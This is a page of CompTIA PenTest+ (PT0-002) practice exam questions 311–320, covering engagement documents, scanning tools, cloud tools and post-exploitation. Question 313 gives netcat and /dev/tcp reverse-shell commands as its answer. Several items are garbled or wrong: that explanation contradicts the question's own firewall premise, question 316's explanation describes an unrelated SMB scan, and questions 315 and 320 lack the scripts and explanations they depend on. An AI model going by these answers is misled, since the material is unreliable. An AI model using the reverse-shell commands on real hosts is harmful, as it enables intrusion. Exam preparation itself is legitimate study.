CompTIA PT0-002 Online Practice Questions and Exam Preparation

CompTIA PT0-002 Online Questions & Answers

• Question 311:

  Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

  A. SOW
  B. SLA
  C. MSA
  D. NDA
  A. SOW

  ---

  Explanation

  The document that is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables is the SOW (Statement of Work). The SOW is a formal document that describes the objectives, expectations, and responsibilities of the penetration-testing project2. The SOW should be clear, concise, and comprehensive to avoid any ambiguity or misunderstanding.

• Question 312:

  A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy.

  Which of the following would be the BEST to use to find vulnerabilities on this server?

  A. OpenVAS
  B. Nikto
  C. SQLmap
  D. Nessus
  C. SQLmap

  ---

  Explanation

  https://phoenixnap.com/blog/best-penetration-testing-tools

• Question 313:

  After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic.

  Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

  A. bash -i >and /dev/tcp 8443 0>andl
  B. nc -e host 8443 /bin/bash
  C. nc -vlp 8443 /bin/bash
  D. nc -vp 8443 /bin/bash
  B. nc -e host 8443 /bin/bash

  ---

  Explanation

  When a firewall is blocking outbound traffic, a penetration tester can attempt to use a reverse shell to obtain an interactive shell on the remote host. The command nc -e host 8443 /bin/bash uses Netcat to create a reverse shell, connecting

  back to the attacker's machine on port 8443 and executing /bin/bash.

  This command assumes that outbound traffic is allowed on the specified port (8443) and that Netcat is available on the target system. It effectively bypasses the firewall's restrictions by initiating the connection from the inside.

  References:

  Explanation of reverse shell techniques: Pentestmonkey Reverse Shell Cheat Sheet

  Practical examples from penetration testing scenarios: Horizontall.

• Question 314:

  Which of the following is a rules engine for managing public cloud accounts and resources?

  A. Cloud Custodian
  B. Cloud Brute
  C. Pacu
  D. Scout Suite
  A. Cloud Custodian

  ---

  Explanation

  Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to define policies to enable a well managed cloud infrastructure, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.

  Cloud Custodian is a tool that can be used to manage public cloud accounts and resources. Cloud Custodian can define policies and rules for cloud resources based on various criteria, such as tags, filters, actions, modes, or schedules. Cloud Custodian can enforce compliance, governance, security, cost optimization, and operational efficiency for cloud resources. Cloud Custodian supports multiple public cloud providers, such as AWS, Azure, GCP, and Kubernetes. Cloud Brute is a tool that can be used to enumerate cloud platforms and discover hidden files and buckets. Pacu is a tool that can be used to exploit AWS environments and perform post-exploitation actions. Scout Suite is a tool that can be used to audit cloud environments and identify security issues.

• Question 315:

  A penetration tester wrote the following Bash script to brute force a local service password:

  

  The script is not working as expected. Which of the following changes should the penetration tester make to get the script to work?

  

  A. Option A
  B. Option B
  C. Option C
  D. Option D
  A. Option A

  ---

  Explanation

• Question 316:

  A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection.

  Which of the following Nmap options will the penetration tester MOST likely utilize?

  A. -8 -T0
  B. --script "http*vuln*"
  C. -sn
  D. -O -A
  B. --script "http*vuln*"

  ---

  Explanation

  Nmap is a tool that can perform network scanning and enumeration by sending packets to hosts and analyzing their responses. The command Nmap -p 445 -n - T4 --open 172.21.0.0/16 would scan for SMB port 445 over a /16 network with

  the following options:

  -p 445 specifies the port number to scan.

  -n disables DNS resolution, which can speed up the scan by avoiding unnecessary queries.

  -T4 sets the timing template to aggressive, which increases the speed of the scan by sending packets faster and waiting less for responses. -Open only shows hosts that have open ports, which can reduce the output and focus on relevant

  results. The other commands are not optimal for scanning SMB port 445 over a /16 network when stealth is not a concern and the task is time sensitive.

• Question 317:

  Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

  A. The IP address is wrong.
  B. The server is unreachable.
  C. The IP address is on the blocklist.
  D. The IP address is on the allow list.
  C. The IP address is on the blocklist.

  ---

  Explanation

  The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.

• Question 318:

  Which of the following tools provides Python classes for interacting with network protocols?

  A. Responder
  B. Impacket
  C. Empire
  D. PowerSploit
  B. Impacket

  ---

  Explanation

  Impacket is a tool that provides Python classes for interacting with network protocols, such as SMB, DCE/RPC, LDAP, Kerberos, etc. Impacket can be used for network analysis, packet manipulation, authentication spoofing, credential dumping, lateral movement, and remote execution.

  https://github.com/SecureAuthCorp/impacket

• Question 319:

  A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code.

  Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

  A. Immunity Debugger
  B. OllyDbg
  C. GDB
  D. Drozer
  A. Immunity Debugger

  ---

  Explanation

  Immunity Debugger is a tool that can be used to deconstruct 64-bit Windows binaries and see the underlying code. Immunity Debugger is a powerful debugger that integrates with Python and allows users to write their own scripts and plugins. It can be used for reverse engineering, malware analysis, vulnerability research, and exploit development

• Question 320:

  A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal

  Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

  

  Which of the following would be the BEST command to use for further progress into the targeted network?

  A. nc 10.10.1.2
  B. ssh 10.10.1.2
  C. nc 127.0.0.1 5555
  D. ssh 127.0.0.1 5555
  C. nc 127.0.0.1 5555

  ---

  Explanation